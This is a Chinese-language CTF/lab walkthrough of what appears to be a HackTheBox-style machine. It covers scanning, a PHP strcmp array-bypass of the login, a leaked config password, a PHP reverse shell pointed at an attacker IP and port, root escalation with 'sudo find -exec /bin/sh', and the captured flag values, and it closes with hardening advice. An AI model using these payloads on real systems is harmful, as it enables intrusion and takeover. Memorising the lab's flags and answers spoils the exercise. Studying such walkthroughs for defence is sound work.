网络安全渗透测试实战教学：从基础扫描到权限提升<\/h1>

1. 初始信息收集<\/h2>

1.1 端口扫描<\/h3>
使用Nmap进行基础扫描，识别开放端口和服务：<\/p>
nmap -sC -sV 10.129.234.232
<\/span><\/span><\/code><\/pre>发现开放端口<\/strong>：<\/p>

22端口：SSH服务<\/li>
80端口：HTTP服务<\/li>
<\/ul>
2. Web应用分析<\/h2>
2.1 登录页面路径<\/h3>
通过目录扫描或手动探测发现登录页面路径：<\/p>
\/login\/login.php
<\/code><\/pre>
2.2 目录结构分析<\/h3>
使用Gobuster进行目录扫描：<\/p>
gobuster dir --url http:\/\/10.129.234.232 --wordlist .\/word.txt
<\/span><\/span><\/code><\/pre>重要发现<\/strong>：<\/p>

\/_uploaded<\/code>：文件上传目录<\/li>
\/admin<\/code>：可能存在管理后台<\/li>
\/static<\/code>：静态资源目录<\/li>
<\/ul>
2.3 登录目录文件数量<\/h3>
\/login<\/code>目录下存在3个文件：<\/p>

login.php<\/code>：登录主页面<\/li>
config.php<\/code>：配置文件<\/li>
第三个文件可能是.htaccess<\/code>或其他支持文件<\/li>
<\/ol>
3. 登录机制分析<\/h2>
3.1 密码比较函数<\/h3>
后端使用PHP的strcmp()<\/code>函数进行用户名密码验证：<\/p>
strcmp<\/span>($user_input, $valid_credential);
<\/span><\/span><\/code><\/pre>安全漏洞<\/strong>：<\/p>

PHP 7.3.0之前版本的strcmp()<\/code>函数存在类型转换漏洞，可通过数组绕过验证：
$_POST['password'<\/span>] =<\/span> array<\/span>(); \/\/ 可绕过strcmp验证
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3.2 配置文件泄露<\/h3>
发现配置文件路径：<\/p>
\/var\/www\/html\/login\/config.php
<\/code><\/pre>
内容示例<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$db_user =<\/span> "john"<\/span>;
<\/span><\/span>$db_pass =<\/span> "thisisagoodpassword"<\/span>;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. 文件上传与利用<\/h2>
4.1 上传目录<\/h3>
上传文件存储在：<\/p>
\/_uploaded\/
<\/code><\/pre>
4.2 Webshell上传<\/h3>
上传PHP反向shell脚本（示例代码已提供），关键参数：<\/p>
$ip =<\/span> '10.10.16.5'<\/span>; \/\/ 攻击者IP
<\/span><\/span><\/span><\/span>$port =<\/span> 10032<\/span>; \/\/ 攻击者监听端口
<\/span><\/span><\/span><\/code><\/pre>5. 系统用户信息<\/h2>
5.1 有效用户<\/h3>
系统存在用户：<\/p>

john<\/code>：具有主目录\/home\/john<\/code><\/li>
密码：thisisagoodpassword<\/code>（从配置文件获取）<\/li>
<\/ul>
6. 权限提升<\/h2>
6.1 sudo权限检查<\/h3>
发现用户john<\/code>可以以root身份运行find<\/code>命令：<\/p>
\/usr\/bin\/find
<\/code><\/pre>
6.2 find命令提权<\/h3>
利用find的-exec<\/code>参数执行命令：<\/p>
sudo find . -exec \/bin\/sh \;<\/span> -quit
<\/span><\/span><\/code><\/pre>提权原理<\/strong>：<\/p>

-exec<\/code>：对每个匹配文件执行指定命令<\/li>
\;<\/code>：表示命令结束<\/li>
-quit<\/code>：处理第一个文件后立即退出<\/li>
<\/ul>
6.3 GTFOBins利用<\/h3>
参考GTFOBins（https:\/\/gtfobins.github.io\/）中关于find的提权方法：<\/p>
sudo find . -exec \/bin\/sh \; -quit
<\/code><\/pre>
7. 标志获取<\/h2>
7.1 用户flag<\/h3>
路径：<\/p>
\/home\/john\/user.txt
<\/code><\/pre>
内容：<\/p>
f54846c258f3b4612f78a819573d158e
<\/code><\/pre>
7.2 root flag<\/h3>
路径：<\/p>
\/root\/root.txt
<\/code><\/pre>
内容：<\/p>
51709519ea18ab37dd6fc58096bea949
<\/code><\/pre>
8. 安全建议<\/h2>


strcmp使用<\/strong>：<\/p>

升级PHP至7.3.0+版本<\/li>
使用严格比较===<\/code>替代strcmp<\/code><\/li>
<\/ul>
<\/li>

配置文件保护<\/strong>：<\/p>

将配置文件移出Web可访问目录<\/li>
设置适当权限（600）<\/li>
<\/ul>
<\/li>

sudo权限控制<\/strong>：<\/p>

避免普通用户以root身份运行find等危险命令<\/li>
使用更细粒度的sudoers配置<\/li>
<\/ul>
<\/li>

文件上传限制<\/strong>：<\/p>

验证文件类型和内容<\/li>
将上传目录设置为不可执行<\/li>
<\/ul>
<\/li>

交换文件安全<\/strong>：<\/p>

注意.swp<\/code>文件可能泄露敏感信息<\/li>
考虑禁用swap或加密swap分区<\/li>
<\/ul>
<\/li>
<\/ol>
9. 完整渗透流程总结<\/h2>

端口扫描发现服务<\/li>
Web目录枚举找到登录页面<\/li>
分析登录机制，利用strcmp漏洞或获取凭据<\/li>
通过文件上传获取webshell<\/li>
横向移动获取用户凭据<\/li>
利用sudo权限不当配置提权<\/li>
获取最终flag<\/li>
<\/ol>
通过此案例，可以全面了解从信息收集到权限提升的完整渗透测试流程。<\/p>